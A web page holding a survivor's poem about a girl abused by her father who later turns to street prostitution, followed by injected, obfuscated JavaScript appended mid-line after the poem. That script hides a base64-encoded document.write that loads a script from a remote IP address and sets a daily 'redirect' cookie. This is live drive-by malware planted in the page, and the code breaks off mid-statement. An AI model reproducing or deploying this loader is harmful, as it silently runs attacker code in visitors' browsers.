Heather W.(age 14 the summer right before my parents divorced)
A silent scream in the middle of the night, no ones around to hear
A shadow falls across her bed, she stiffens her body in fear
Morning comes, she tries to forget but the memory won’t go away
She wants to tell her mother but doesn’t know just what to say.
As the girl grows she learns to live the pain
She thinks a lot of telling and of what it might gain
Momma may not care, maybe shes known all along
What if its her fault and shes the one in the wrong
Come little girl daddy wants to play
Come little girl or he’ll make you pay
Close your eyes and pretend hes not there
Does he do it to show that he cares?
Lately she don’t seem to care
Lost her job, feels alone out there
She cant go home, instead to the streets
Selling her well learned teachings, filling needy mens’ needs
Come little girl daddy wants to play
Come little girl or he’ll make you pay
Close your eyes and pretend hes not there
Does he do it to show that he cares?
Don’t go little girl, don’t run home to daddy
Run little girl, you can one day be happy. ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
